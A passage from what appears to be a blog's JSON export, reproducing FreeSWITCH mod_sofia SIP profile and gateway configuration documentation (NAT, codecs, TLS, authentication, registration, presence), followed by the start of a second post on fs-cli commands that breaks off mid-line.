sofia.conf.xml — and any volunteer who can create one would be very welcome indeed.\nGateway Each profile can have several gateways: elements\u0026hellip; elements\u0026hellip; A gateway has an attribute \u0026ldquo;name\u0026rdquo; by which it can be referred. A gateway describes how to use a different UA to reach destinations. For example, the gateway may provide access to the PSTN, or to a private SIP network. The reason for defining a gateway, presumably, is because the gateway requires certain information before it will accept a call from the FreeSWITCH User Agent. Variables can be defined on a gateway. Inbound variables are set on the channel of a call received from a gateway, outbound variables are set on the channel of a call sent to a gateway. An example gateway configuration would be: To reach a particular gateway from the dial plan, use sofia/gateway/\u0026lt;gateway_name\u0026gt;/\nFreeSWITCH can also subscribe to receive notification of events from the gateway. For more information see Presence - Use FreeSWITCH as a Client\nParameters The following is a list of param elements that are children of a gateway element:\nNote: The username param for the gateway is not to be confused with the username param in the Profile settings config!\nNote: extension parameter influence the contents of channel variable Caller-Destination-Number and destination_number. If it is blank, Caller-Destination-Number will always be set to gateway\u0026rsquo;s username. If it has a value, Caller-Destination-Number will always be set to this value. If it has value auto_to_user, Caller-Destination-Number will be populated with value ${sip_to_user} which means the real dialled number in case of an inbound call.\nping-min means \u0026ldquo;how many successful pings we must have before declaring a gateway up\u0026rdquo;. The interval between ping-min and ping-max is the \u0026ldquo;safe area\u0026rdquo; where a gateway is marked as UP. So if we have, for example, min 3 and max 6, if the gateway is up and we move counter between 3,4,5,6 the gateway will be up. If from 6 we loose 4 (so counter == 2) pings in a row, the gateway will be declared down. Please note that on sofia startup the gateway is always started as UP, so it will be up even if ping-min is \u0026gt; 1 . the \u0026ldquo;right\u0026rdquo; way starts when the gateway goes down.\nParam \u0026ldquo;register,\u0026rdquo; is used when this profile acts as a client to another UA. By registering, FreeSWITCH informs the other UA of its whereabouts. This is generally used when FreeSWITCH wants the other UA to send FreeSWITCH calls, and the other UA expects this sort of registration. If FreeSWITCH uses the other UA only as a gateway (e.g., to the PSTN), then registration is not generally required. Param \u0026ldquo;distinct-to\u0026rdquo; is used when you want FS to register using a distict AOR for header To. It requires proper setting of related parameters. For example if you want the REGISTER to go with: From: sip:someuser@somedomain.com To: sip:anotheruser@anotherdomain.com\nThen set the parameters as this: The latter param, \u0026ldquo;ping\u0026rdquo; is used to check gateway availability. By setting this option, FreeSWITCH will send SIP OPTIONS packets to gateway. If gateway responds with 200 or 404, gateway is pronounced up, otherwise down. [N.B. It appears that other error messages can be returned and still result in the gateway being marked as \u0026lsquo;up\u0026rsquo;?] If any call is routed to gateway with state down, FreeSWITCH will generate NETWORK_OUT_OF_ORDER hangup cause. Ping frequency is defined in seconds (value attribute) and has a minimum value of 5 seconds. Param \u0026ldquo;extension-in-contact\u0026rdquo; is used to force what the contact info will be in the registration. If you are having a problem with the default registering as gw+gateway_name@ip you can set this to true to use extension@ip. If extension is blank, it will use username@ip.\nif you need to insert the FROM digits to the Contact URI User Part when sending call to gateway BEFORE From: \u0026ldquo;8885551212\u0026rdquo; sip:88855512120@8.8.8.8 Contact: sip:gw+mygateway@7.7.7.7:7080 try adding these to gateway params\nThese channel variables will be set on all calls going through this gateway in the specified direction. However, see below for a special syntax to set profile variables rather than channel variables. Settings Settings include other, more general information about the profile, including whether or not STUN is in use. Each profile has its own settings element. Not only is this convenient — it\u0026rsquo;s possible to set up one profile to use STUN and another, with a different gateway or working behind the firewall, not needing STUN — but it\u0026rsquo;s also crucial. That\u0026rsquo;s because each profile defines a SIP User Agent, and each UA must have its own unique \u0026ldquo;sip-port.\u0026rdquo; By convention, 5060 is the default port, but it\u0026rsquo;s possible to make calls to, e.g., \u0026ldquo;foo@sip.example.com:5070\u0026rdquo;, and therefore you can define any port you please for each individual profile. The conf directory contains a complete sample sofia.conf.xml file, along with comments. See Git examples: Internal, External\nBasic settings alias This seems to make the SIP profile bind to this IP \u0026amp; port as well as your SIP / RTP IPs and ports. Anthony had this to say about aliases in a ML thread: Aliases in the tag are a list of keys you want to use to use that lead to the current profile your are configuring. Think of it as the /etc/hosts file in unix only for profiles. When you define aliases to match all of the possible domains hosted on a particular profile, then when you try to take a user@host.com notation and decide which profile it came from, you can use the aliases to find it providing you have added to that profile.\nshutdown-on-fail If set to true and the profile fails to load, FreeSWITCH will shut down. This is useful if you are running something like Pacemaker and OpenAIS which manage a pair of FreeSWITCH nodes and automatically monitor, start, stop, restart, and standby-on-fail the nodes. It will ensure that the specific node is not able to be used in a \u0026ldquo;partially up\u0026rdquo; situation.\nuser-agent-string This sets the User-Agent header in all SIP messages sent by your server. By default this could be something like \u0026ldquo;FreeSWITCH-mod_sofia/1.0.trunk-12805\u0026rdquo;. If you didn\u0026rsquo;t want to advertise detailed version information you could simply set this to \u0026ldquo;FreeSWITCH\u0026rdquo; or even \u0026ldquo;Asterisk PBX\u0026rdquo; as a joke. Take care when setting this value as certain characters such as \u0026lsquo;@\u0026rsquo; could cause other SIP proxies could reject your messages as invalid.\nlog-level sip-trace context Dialplan context in which to dump calls that come in to this profile\u0026rsquo;s ip:port\nsip-port Port to bind to for SIP traffic:\nsip-ip IP address to bind to for SIP traffic. DO NOT USE HOSTNAMES, ONLY IP ADDRESSES\nrtp-ip IP address to bind to for RTP traffic. DO NOT USE HOSTNAMES, ONLY IP ADDRESSES Multiple rtp-ip support: if more rtp-ip parameters are added, they will be used in round-robin as new calls progress. IPv6 addresses are not supported under Windows at the time of writing. See FS-4445 ext-rtp-ip This is the IP behind which FreeSWITCH is seen from the Internet, so if FreeSWITCH is behind NAT, this is basically the public IP that should be used for RTP. Possible values are: Any variable from vars.xml, e.g. $${external_rtp_ip}:\n\u0026ldquo;specific IP address\u0026rdquo;\n\u0026ldquo;when used for LAN and WAN to avoid errors in the SIP CONTACT sent to LAN devices, use\u0026rdquo;\n\u0026ldquo;auto\u0026rdquo;: the guessed IP will be used (guessed by looking in the IP routing table which interface is the default route)\n\u0026ldquo;auto-nat\u0026rdquo;: FreeSWITCH will use uPNP or NAT-PMP to discover the public IP address it should use\n\u0026ldquo;stun:DNS name or IP address\u0026rdquo;: FreeSWITCH will use the STUN server of your choice to discover the public IP address\n\u0026ldquo;host:DNS name\u0026rdquo;: FreeSWITCH will resolve the DNS name as the public IP address, so you can use a dynamic DNS host\nATTENTION: AS OF 2012Q4, \u0026rsquo;ext–\u0026rsquo; prefixed params cited above when populated with to-be-resolved DNS strings \u0026ndash; e.g. name=\u0026ldquo;ext–sip–ip\u0026rdquo; value=\u0026ldquo;stun:stun.freeswitch.org\u0026rdquo; or name=\u0026ldquo;ext‑rtp–ip\u0026rdquo; value=\u0026ldquo;host:mypublicIP.dyndns.org\u0026rdquo; \u0026ndash; are resolved to IP addresses once only at FS load time and const thereafter. FS is blind to (unaware of) any subsequent changes in your environment\u0026rsquo;s IP address. Thus, these ext– vars may become functionally incompatible with the environment\u0026rsquo;s current IP addresses with unspecified results in call flow at the network layer. FS restart is required for FS to capture the now-current, working IP address(es).\next-sip-ip This is the IP behind which FreeSWITCH is seen from the Internet, so if FreeSWITCH is behind NAT, this is basically the public IP that should be used for SIP. Possibles values are the same as those for ext-rtp-ip, and it is usually set to the same value.\ntcp-keepalive Set this to interval (in milliseconds) to send keep alive packets to user agents (UAs) registered via TCP; do not set to disable.\ntcp-pingpong tcp-ping2pong dialplan The dialplan parameter is very powerful. In the simplest configuration, it will use the XML dialplan. This means that it will read data from mod_xml_curl XML dialplans (e.g., callback to your webserver), or failing that, from the XML files specified in freeswitch.xml dialplan section. (e.g. default_context.xml)\nYou can also add enum lookups into the picture (since mod_enum provides dialplan functionality), so enum lookups override the XML dialplan\nOr reverse the order to enum is only consulted if XML lookup fails\nIt is also possible to specify a specific enum root\nOr use XML on a custom file\nWhere it will first check the specific XML file, then hit normal XML which also do a mod_xml_curl lookup assuming you have that configured and working.\nMedia related options See also: Proxy Media\nresume-media-on-hold When calls are in no media this will bring them back to media when you press the hold button. To return the calls to bypass-media after the call is unheld, enable bypass-media-after-hold.\nbypass-media-after-att-xfer This will allow a call after an attended transfer go back to bypass media after an attended transfer. bypass-media-after-hold This will allow a call to go back to bypass media after a hold. This option can be enabled only if resume-media-on-hold is set. Available from git rev 8fa385b. inbound-bypass-media Uncomment to set all inbound calls to no media mode. It means that the FreeSWITCH server only keeps the SIP messages state, but have the RTP steam go directly from end-point to end-point\ninbound-proxy-media Uncomment to set all inbound calls to proxy media mode. This means the FreeSWITCH keeps both the SIP and RTP traffic on the server but does not interact with the RTP stream.\ndisable-rtp-auto-adjust ignore-183nosdp enable-soa Set the value to \u0026ldquo;false\u0026rdquo; to diable SIP SOA from sofia to tell sofia not to touch the exchange of SDP\nt38-passthru The following options are available\n\u0026rsquo;true\u0026rsquo; enables t38 passthru \u0026lsquo;false\u0026rsquo; disables t38 passthru \u0026lsquo;once\u0026rsquo; enables t38 passthru, but sends t.38 re-invite only once (available since commit 08b25a8 from Nov. 9, 2011) Codecs related options Also see:\nCodec Negotiation Supported Codecs inbound-codec-prefs This parameter allows to change the allowed inbound codecs per profile. outbound-codec-prefs This parameter allows to change the outbound codecs per profile. codec-prefs This parameter allows to change both inbound-codec-prefs and outbound-codec-prefs at the same time. inbound-codec-negotiation set to \u0026lsquo;greedy\u0026rsquo; if you want your codec list to take precedence if \u0026lsquo;greedy\u0026rsquo; doesn\u0026rsquo;t work for you, try \u0026lsquo;scrooge\u0026rsquo; which has been known to fix misreported ptime issues with DID providers such as CallCentric. A rule of thumb is:\n\u0026lsquo;generous\u0026rsquo; permits the remote codec list have precedence and \u0026lsquo;win\u0026rsquo; the codec negotiation and selection process \u0026lsquo;greedy\u0026rsquo; forces a win by the local FreeSWITCH preference list \u0026lsquo;scrooge\u0026rsquo; takes \u0026lsquo;greedy\u0026rsquo; a step further, so that the FreeSWITCH wins even when the far side lies about capabilities during the negotiation process sip_codec_negotiation is a channel variable version of this setting\ninbound-late-negotiation Uncomment to let calls hit the dialplan before you decide if the codec is OK. bitpacking This setting is for AAL2 bitpacking on G.726. disable-transcoding Uncomment if you want to force the outbound leg of a bridge to only offer the codec that the originator is using\nrenegotiate-codec-on-reinvite STUN If you need to use a STUN server, here are common working examples:\next-rtp-ip stun.fwdnet.net is a publicly-accessible STUN server.\next-sip-ip stun-enabled Simple traversal of UDP over NATs (STUN), is used to help resolve the problems associated with SIP clients, behind NAT, using private IP address space in their messaging. Use stun when specified (default is true).\nstun-auto-disable Set to true to have the profile determine stun is not useful and turn it off globally\nNATing apply-nat-acl When receiving a REGISTER or INVITE, enable NAT mode automatically if IP address in Contact header matches an entry defined in the RFC 1918 access list. \u0026ldquo;acl\u0026rdquo; is a misnomer in this case because access will not be denied if the user\u0026rsquo;s contact IP doesn\u0026rsquo;t match.\naggressive-nat-detection This will enable NAT mode if the network IP/port from which the request was received differs from the IP/Port combination in the SIP Via: header, or if the Via: header contains the received parameter (regardless of what it contains.) Note 2009-04-05: Someone please clarify when this would be useful. It seems to me if someone needed this feature, chances are that things are so broken that they would need to use NDLB-force-rport\nVAD and CNG VAD stands for Voice Activity Detector. FreeSWITCH is capable of detecting speech and can stop transmitting RTP packets when no voice is detected.\nvad suppress-cng Suppress Comfort Noise Generator (CNG) on this profile or per call with the \u0026lsquo;suppress_cng\u0026rsquo; variable\nNDLB (A.K.A. No device left behind) NDLB-force-rport This will force FreeSWITCH to send SIP responses to the network port from which they were received. Use at your own risk! For more information see NAT Traversal.\nsafe = param that does force-rport behavior only on endpoints we know are safe to do so on. This is a dirty hack to try to work with certain endpoints behind sonicwall which does not use the same port when it does nat, when the devices do not support rport, while not breaking devices that acutally use different ports that force-rport will break NDLB-broken-auth-hash Used for when phones respond to a challenged ACK with method INVITE in the hash\nNDLB-received-in-nat-reg-contact add a ;received=\u0026quot;:\u0026quot; to the contact when replying to register for nat handling\nNDLB-sendrecv-in-session By default, \u0026ldquo;a=sendrecv\u0026rdquo; is only included in the media portion of the SDP. While this is RFC-compliant, it may break functionality for some SIP devices. To also include \u0026ldquo;a=sendrecv\u0026rdquo; in the session portion of the SDP, set this parameter to true.\nNDLB-allow-bad-iananame Introduced in rev. 15401, this was enabled by default prior to new param. Will allow codecs to match respective name even if the given string is not correct. i.e., Linksys and Sipura phones will pass G.729a by default instead of G.729 as codec string therefore not matching. If you wish to allow bad IANA names to match respective codec string, add the following param to your SIP profile. Refer to RFC 3551, RFC 3555 and the IANA list(s) for SDP\nCall ID inbound-use-callid-as-uuid On inbound calls make the uuid of the session equal to the SIP call id of that call.\noutbound-use-uuid-as-callid On outbound calls set the callid to match the uuid of the session\nThis goes in the \u0026ldquo;..sip_profiles/external.xml\u0026rdquo; file.\nTLS Please make sure to read SIP TLS before enabling certain features below as they may not behave as expected.\ntls TLS: disabled by default, set to \u0026ldquo;true\u0026rdquo; to enable tls-only disabled by default, when enabled prevents sofia from listening on the unencrypted port for this connection. This can stop many generic brute force scripts and if all your clients connect over TLS then can help decrease the exposure of your FreeSWITCH server to the world. tls-bind-params additional bind parameters for TLS tls-sip-port Port to listen on for TLS requests. (5061 will be used if unspecified) tls-cert-dir Location of the agent.pem and cafile.pem ssl certificates (needed for TLS server) tls-version TLS version (\u0026ldquo;sslv2\u0026rdquo;, \u0026ldquo;sslv3\u0026rdquo;, \u0026ldquo;sslv23\u0026rdquo;, \u0026ldquo;tlsv1\u0026rdquo;, \u0026ldquo;tlsv1.1\u0026rdquo;, \u0026ldquo;tlsv1.2\u0026rdquo;). NOTE: Phones may not work with TLSv1 When not set defaults to: \u0026ldquo;tlsv1,tlsv1.1,tlsv1.2\u0026rdquo;\ntls-passphrase If your agent.pem is protected by a passphrase stick the passphrase here to enable FreeSWITCH to decrypt the key. tls-verify-date If the client/server certificate should have the date on it validated to ensure it is not expired and is currently active. tls-verify-policy This controls what, if any security checks are done against server/client certificates. Verification is generally checking certificates are valid against the cafile.pem. Set to \u0026lsquo;in\u0026rsquo; to only verify incoming connections, \u0026lsquo;out\u0026rsquo; to only verify outgoing connections, \u0026lsquo;all\u0026rsquo; to verify all connections, also \u0026lsquo;subjects_in\u0026rsquo;, \u0026lsquo;subjects_out\u0026rsquo; and \u0026lsquo;subjects_all\u0026rsquo; for subject validation (subject validation for outgoing connections is against the hostname/ip connecting to). Multiple policies can be split with a \u0026lsquo;|\u0026rsquo; pipe, for example \u0026lsquo;subjects_in|subjects_out\u0026rsquo;. Defaults to none. tls-verify-depth When certificate validation is enabled (tls-verify-policy) how deep should we try to verify a certificate up the chain again the cafile.pem file. By default only depth of 2. tls-verify-in-subjects If subject validation is enabled for incoming connections (tls-verify-policy set to \u0026lsquo;subjects_in\u0026rsquo; or \u0026lsquo;subjects_all\u0026rsquo;) this is the list of subjects that are allowed (delimit with a \u0026lsquo;|\u0026rsquo; pipe), note this only effects incoming connections for outgoing connections subjects are always checked against hostnames/ips. DTMF rfc2833-pt TODO RFC 2833 is obsoleted by RFC 4733.\ndtmf-duration dtmf-type TODO RFC 2833 is obsoleted by RFC 4733. Set the parameter in the SIP profile:\nor\nor\nOR set the variable in the SIP gateway or user profile (NOT in the channel, it must be before CS_INIT): Note the \u0026ldquo;_\u0026rdquo; instead of \u0026ldquo;-\u0026rdquo; in profile param (this is var set in dialplan). (24.10.2010: \u0026ldquo;both\u0026rdquo; don\u0026rsquo;t seem to me work in my tests, \u0026ldquo;outbound\u0026rdquo; does) Note: for inband DTMF, Misc. Dialplan Tools start_dtmf must be used in the dialplan. Also, to change the outgoing routing from info or rfc2833 to inband, use Misc._Dialplan_Tools_start_dtmf_generate RFC 2833\npass-rfc2833 TODO RFC 2833 is obsoleted by RFC 4733. Default: false If true, it passes RFC 2833 DTMF\u0026rsquo;s from one side of a bridge to the other, untouched. Otherwise, it decodes and re-encodes them before passing them on.\nliberal-dtmf TODO RFC 2833 is obsoleted by RFC 4733. Default: false For DTMF negotiation, use this parameter to just always offer 2833 and accept both 2833 and INFO. Use of this parameter is not recommended since its purpose is to try to cope with buggy SIP implementations.\nSIP Related options enable-timer This enables or disables support for RFC 4028 SIP Session Timers.\nNote: If your switch requires the timer option; for instance, Huawei SoftX3000, it needs this optional field and drops the calls with \u0026ldquo;Session Timer Check Message Failed\u0026rdquo;, then you may be able to revert back the commit that took away the Require: timer option which is an optional field by: git log -1 -p 58c3c3a049991fedd39f62008f8eb8fca047e7c5 libs/sofia-sip/libsofia-sip-ua | patch -p1 -R touch libs/sofia-sip/.update\nmake mod_sofia-clean make mod_sofia-install\nenable-100rel This enable support for 100rel (100% reliability - PRACK message as defined in RFC3262) This fixes a problem with SIP where provisional messages like \u0026ldquo;180 Ringing\u0026rdquo; are not ACK\u0026rsquo;d and therefore could be dropped over a poor connection without retransmission. 2009-07-08: Enabling this may cause FreeSWITCH to crash, see FSCORE-392.\nminimum-session-expires This sets the \u0026ldquo;Min-SE\u0026rdquo; value (in seconds) from RFC 4028. This value must not be less than 90 seconds.\nsip-options-respond-503-on-busy When set to true, this param will make FreeSWITCH respond to incoming SIP OPTIONS with 503 \u0026ldquo;Maximum Calls In Progress\u0026rdquo; when FS is paused or maximum sessions has been exceeded. When set to false or when not set at all (default behavior), SIP OPTIONS are always responded with 200 \u0026ldquo;OK\u0026rdquo;.\nSetting this param to true is especially useful if you\u0026rsquo;re using a proxy such as OpenSIPS or Kamailio with dispatcher module to probe your FreeSWITCH servers by sending SIP OPTIONS.\nsip-force-expires Setting this param overrides the expires value in the 200 OK in response to all inbound SIP REGISTERs towards this sip_profile. This param can be overridden per individual user by setting a sip-force-expires user directory variable.\nsip-expires-max-deviation Setting this param adds a random deviation to the expires value in the 200 OK in response to all inbound SIP REGISTERs towards this sip_profile. Result will be that clients will not re-register at the same time-interval thus spreading the load on your system. For example, if you set:\nthen the expires that is responded will be between 1800-600=1200 and 1800+600=2400 seconds. This param can be overridden per individual user by setting a sip-expires-max-deviation user directory variable.\noutbound-proxy Setting this param will send all outbound transactions to the value set by outbound-proxy. send-display-update Tells FreeSWITCH not to send display UPDATEs to the leg of the call. RTP Related options auto-jitterbuffer-msec Set this to the size of the jitterbuffer you would like to have on all calls coming through this profile.\nrtp-timer-name rtp-rewrite-timestamps If you don\u0026rsquo;t want to pass through timestamps from 1 RTP stream to another, rtp-rewrite-timestamps is a parameter you can set in a SIP Profile (on a per call basis with rtp_rewrite_timestamps chanvar in a dialplan). The result is that FreeSWITCH will regenerate and rewrite the timestamps in all the RTP streams going to an endpoint using this SIP Profile. This could be necessary to fix audio issues when sending calls to some paranoid and not RFC-compliant gateways (Cirpack is known to require this).\nmedia_timeout was: rtp-timeout-sec (deprecated) The number of seconds of RTP inactivity (media silence) before FreeSWITCH considers the call disconnected, and hangs up. It is recommended that you use session timers instead. If this setting is omitted, the default value is \u0026ldquo;0\u0026rdquo;, which disables the timeout.\nmedia_hold_timeout was: rtp-hold-timeout-sec (deprecated) The number of seconds of RTP inactivity (media silence) for a call placed on hold by an endpoint before FreeSWITCH considers the call disconnected, and hangs up. It is recommended that you use session timers instead. If this setting is omitted, the default value is \u0026ldquo;0\u0026rdquo;, which disables the timeout.\nrtp-autoflush-during-bridge Controls what happens if FreeSWITCH detects that it\u0026rsquo;s not keeping up with the RTP media (audio) stream on a bridged call. (This situation can happen if the FreeSWITCH server has insufficient CPU time available.) When set to \u0026ldquo;true\u0026rdquo; (the default), FreeSWITCH will notice when more than one RTP packet is waiting to be read in the incoming queue. If this condition persists for more than five seconds, RTP packets will be discarded to \u0026ldquo;catch up\u0026rdquo; with the audio stream. For example, if there are always five extra 20 ms packets in the queue, 100 ms of audio latency can be eliminated by discarding the packets. This will cause an audio glitch as some audio is discarded, but will improve the latency by 100 ms for the rest of the call. If rtp-autoflush-during-bridge is set to false, FreeSWITCH will instead preserve all RTP packets on bridged calls, even if it increases the latency or \u0026ldquo;lag\u0026rdquo; that callers hear.\nrtp-autoflush Has the same effect as \u0026ldquo;rtp-autoflush-during-bridge\u0026rdquo;, but affects NON-bridged calls (such as faxes, IVRs and the echo test). Unlike \u0026ldquo;rtp-autoflush-during-bridge\u0026rdquo;, the default is false, meaning that high-latency packets on non-bridged calls will not be discarded. This results in smoother audio at the possible expense of increasing audio latency (or \u0026ldquo;lag\u0026rdquo;). Setting \u0026ldquo;rtp-autoflush\u0026rdquo; to true will discard packets to minimize latency when possible. Doing so may cause errors in DTMF recognition, faxes, and other processes that rely on receiving all packets.\nAuth These settings deal with authentication: requirements for identifying SIP endpoints to FreeSWITCH.\nchallenge-realm Choose the realm challenge key. Default is auto_to if not set. auto_from - uses the from field as the value for the SIP realm. auto_to - uses the to field as the value for the SIP realm. - you can input any value to use for the SIP realm. If you want URL dialing to work you\u0026rsquo;ll want to set this to auto_from. If you use any other value besides auto_to or auto_from you\u0026rsquo;ll loose the ability to do multiple domains. Note: comment out to restore the behavior before 2008-09-29\naccept-blind-auth accept any authentication without actually checking (not a good feature for most people)\nauth-calls Users in the directory can have \u0026ldquo;auth-acl\u0026rdquo; parameters applied to them so as to restrict users access to a predefined ACL or a CIDR.\nValue can be \u0026ldquo;false\u0026rdquo; to disable authentication on this profile, meaning that when calls come in the profile will not send an auth challenge to the caller.\nlog-auth-failures Write log entries ( Warning ) on authentication failures ( Registration \u0026amp; Invite ). useful for users wishing to use fail2ban. note: Required SVN#15654 or higher\nauth-all-packets On authed calls, authenticate all the packets instead of only INVITE and REGISTER(Note: OPTIONS, SUBSCRIBE, INFO and MESSAGE are not authenticated even with this option set to true, see http://jira.freeswitch.org/browse/FS-2871)\nRegistration disable-register disable register which may be undesirable in a public switch\nmultiple-registrations Valid values for this parameter are \u0026ldquo;contact\u0026rdquo;, \u0026ldquo;true\u0026rdquo;, \u0026ldquo;false\u0026rdquo;. value=\u0026ldquo;true\u0026rdquo; is the most common use. Setting this value to \u0026ldquo;contact\u0026rdquo; will remove the old registration based on sip_user, sip_host and contact field as opposed to the call_id.\nmax-registrations-per-extension Defines the number of maximum registrations per extension. Valid value for this parameter is an integer greater than 0. Please note that setting this to 1 would counteract the usage of multiple-registrations. When an attempt to register an extension is made after the maximum value has been reached sofia will respond with 403. The following example will set maximum registrations to 2\ninbound-reg-force-matching-username Force the user and auth-user to match.\nforce-publish-expires Force custom presence update expires delta (-1 means endless)\nforce-register-domain all inbound registrations will look in this domain for the users. Comment out to use multiple domains\nforce-register-db-domain all inbound reg will stored in the db using this domain. Comment out to use multiple domains\nsend-message-query-on-register Can be set to \u0026rsquo;true\u0026rsquo;, \u0026lsquo;false\u0026rsquo; or \u0026lsquo;first-only\u0026rsquo;. If set to \u0026rsquo;true\u0026rsquo; (this is the default behavior), mod_sofia will send a message-query event upon registration. mod_voicemail uses this for counting messages.\nIf set to \u0026lsquo;first-only\u0026rsquo;, only the first REGISTER will trigger the message-query (it requires the UA to increment the NC on subsequent REGISTERs. Some phones, snom for instance, do not do this). The final effect of the message-query is to cause a NOTIFY MWI message to be sent to the registering UA (it is used to satisfy terminals that expect MWI without subscribing for it).\nunregister-on-options-fail If set to True with nat-options-ping the endpoint will be unregistered if no answer on OPTIONS packet.\nnat-options-ping With this option set FreeSWITCH will periodically send an OPTIONS packet to all NATed registered endpoints to keep alive connection. If set to True with unregister-on-options-fail the endpoint will be unregistered if no answer on OPTIONS packet.\nall-reg-options-ping With this option set FreeSWITCH will periodically send an OPTIONS packet to all registered endpoints to keep alive connection. If set to True with unregister-on-options-fail the endpoint will be unregistered if no answer on OPTIONS packet.\nregistration-thread-frequency Controls how often registrations in the FreeSWITCH are checked for expiration. ping-mean-interval Controls the mean interval FreeSWITCH™ will send OPTIONS packet to registered user, by default 30 seconds.\nSubscription force-subscription-expires force suscription expires to a lower value than requested\nforce-subscription-domain all inbound subscription will look in this domain for the users. Comment out to use multiple domains\nPresence manage-presence Enable presence. If you want to share your presence (see dbname and presence-hosts) set this to \u0026ldquo;true\u0026rdquo; on the first profile and enable the shared presence database. Then on subsequent profiles that share presence set this variable to \u0026ldquo;passive\u0026rdquo; and enable the shared presence database there as well.\ndbname Used to share presence info across sofia profiles Name of the db to use for this profile\npresence-hold-state By default when a call is placed on hold, monitoring extensions show that extension as ringing. You can change this behavior by specifying this parameter and one of the following values. Available as of commit 1145905 on April 13, 2012.\nconfirmed - Extension appears busy. early (default) - Extension appears to be ringing. terminated - Extension appears idle. presence-hosts A list of domains that have a shared presence in the database specified in dbname. People who use multiple domains per profile can\u0026rsquo;t use this feature anyway, so you\u0026rsquo;ll want to set it to something like \u0026ldquo;DISABLED\u0026rdquo; in this case to avoid getting users from similar domains all mashed together. For multiple domains also known as multi-tenant calling 1001 would call all matching users in all domains. Don\u0026rsquo;t use presence-hosts with multi-tenant.\npresence-privacy Optionally globally hide the caller ID from presence notes in distributed NOTIFY messages. For example, \u0026ldquo;Talk 1002\u0026rdquo; would be the presence note for extension 1001 while it is on a call with extension 1002. If the presence privacy tag is set to true, then it would distribute the presence note as \u0026ldquo;On The Phone\u0026rdquo; (without the extension to which it is connected). So any subscriber\u0026rsquo;s to 1001\u0026rsquo;s presence would not be able to see who he/she is talking to. http://jira.freeswitch.org/browse/FS-849 This also hides the number in the status \u0026ldquo;hold\u0026rdquo;, \u0026ldquo;ring\u0026rdquo;, \u0026ldquo;call\u0026rdquo; and perhaps others. http://jira.freeswitch.org/browse/FS-4420\nsend-presence-on-register Specify whether or not to send presence information when users register. Default is not to send presence information. Valid options:\nfalse true first-only CallerID Related options caller-id type choose one, can be overridden by inbound call type and/or sip_cid_type channel variable Remote-Party-ID header: P-*-Identity family of headers: neither one: pass-callee-id (defaults to true) Disable by setting it to false if you encounter something that your gateway for some reason hates X-headers that it is supposed to ignore\nOther (TO DO) hold-music disable-hold This allows to disable Music On Hold (added in GIT commit e5cc0539ffcbf660637198c698e90c2e30b05c2f, from Fri Apr 30 19:14:39 2010 -0500). This can be useful when the calling device intends to send its own MOH, but nevertheless sends a REINVITE to FreeSWITCH triggering its MOH. This can be done from dialplan also with rtp_disable_hold channel variable.\napply-inbound-acl set which access control lists, defined in acl.conf.xml, apply to this profile\napply-register-acl apply-proxy-acl This allows traffic to be sent to FreeSWITCH via one or more proxy servers. The proxy server should add a header named X-AUTH-IP containing the IP address of the client. FreeSWITCH trusts the proxy because its IP is listed in the proxy server ACL, and uses the value of the IP in this header as the client\u0026rsquo;s IP for ACL authentication (acl defined in apply-inbound-acl).\nrecord-template max-proceeding max number of open dialogs in proceeding\nbind-params if you want to send any special bind params of your own\ndisable-transfer disable transfer which may be undesirable in a public switch\nmanual-redirect enable-3pcc enable-3pcc determines if third party call control is allowed or not. Third party call control is useful in cases where the SIP invite doesn\u0026rsquo;t include a SDP (late media negotiation). enable-3pcc can be set to either \u0026rsquo;true\u0026rsquo; or \u0026lsquo;proxy\u0026rsquo;, true accepts the call right away, proxy waits until the call has been answered then sends accepts\nnonce-ttl TTL for nonce in sip auth\nThis parameter is set to 60 seconds if not set here. It\u0026rsquo;s used to determine how long to store the user registration record in the sip_authentication table. The expires field in the sip_authentication table is this value plus the expires set by the user agent.\nsql-in-transactions If set to true (default), it will instruct the profile to wait for 500 SQL statements to accumulate or 500ms to elapse and execute them in a transaction (to boost performance).\nodbc-dsn If you have ODBC support and a working dsn you can use it instead of SQLite\nmwi-use-reg-callid username If you wish to hide the fact that you are using FreeSWITCH in the SDP message (Specifically the o= and and s= fields) , then set the username param under the profile. This has no relation whatsoever with the username parameter when we\u0026rsquo;re dealing with gateways. If this value is left unset the system defaults using FreeSWITCH as the username parameter with the o= and s= fields.\nExample: . v=0. o=root 1346068950 1346068951 IN IP4 1.2.3.4. s=root. c=IN IP4 1.2.3.4. t=0 0. m=audio 26934 RTP/AVP 18 0 101 13. a=fmtp:18 annexb=no. a=rtpmap:101 telephone-event/8000. a=fmtp:101 0-16. a=ptime:20.\nwhen you set Directory of Users To allow users to register with the server, the user information must be specified in the conf/directory/default/*xml file. To dynamically specify what users can register, use Mod xml curl\nDefault Configuration File From the FreeSWITCH Github repository\u0026rsquo;s vanilla configurations ([conf/vanilla/autoload_configs/sofia.conf.xml](https://github.com/signalwire/freeswitch/blob/master/conf/vanilla/autoload_configs/sofia.conf.xml)): conf/autoload_configs/sofia.conf.xml \u0026lt;global_settings\u0026gt; \u0026lt;!\u0026ndash; the new format for HEPv2/v3 and capture ID protocol:host:port;hep=2;capture_id=200;\n\u0026ndash;\u0026gt; \u0026lt;/global_settings\u0026gt;\nshutdown and restart FreeSWITCH (or) unload and load mod_sofia If you\u0026rsquo;ve only made changes to a particular profile, you may simply (WARNING: will drop all calls associated with this profile):\nsofia profile restart reloadxml Security Features SIP TLS for secure signaling. SRTP for secure media delivery. The Auth section above for authentication settings. 参考 https://freeswitch.org/confluence/display/FREESWITCH/Sofia+Configuration+Files ","permalink":"https://wdd.js.org/freeswitch/sofia-config/","summary":"About Sofia is a FreeSWITCH™ module (mod_sofia) that provides SIP connectivity to and from FreeSWITCH in the form of a User Agent. A \u0026ldquo;User Agent\u0026rdquo; (\u0026ldquo;UA\u0026rdquo;) is an application used for handling a certain network protocol; the network protocol in Sofia\u0026rsquo;s case is SIP. Sofia is the general name of any User Agent in FreeSWITCH using the SIP network protocol. For example, Sofia receives calls sent to FreeSWITCH from other SIP User Agents (UAs), sends calls to other UAs, acts as a client to register FreeSWITCH with other UAs, lets clients register with FreeSWITCH, and connects calls (i.","title":"Sofia 模块全部配置"},{"content":"安装单个模块 make mod_sofia-install make mod_ilbc-install fs-cli事件订阅 /event plain ALL /event plain CHANNEL_ANSWER sofia 帮助文档 sofia help USAGE: -------------------------------------------------------------------------------- sofia global siptrace \u0026lt;on|off\u0026gt; sofia capture \u0026lt;on|off\u0026gt; watchdog \u0026lt;on|off\u0026gt; sofia profile \u0026lt;name\u0026gt; [start | stop | restart | rescan] [wait] flush_inbound_reg [\u0026lt;call_id\u0026gt; | \u0026lt;[user]@domain\u0026gt;] [reboot] check_sync [\u0026lt;call_id\u0026gt; | 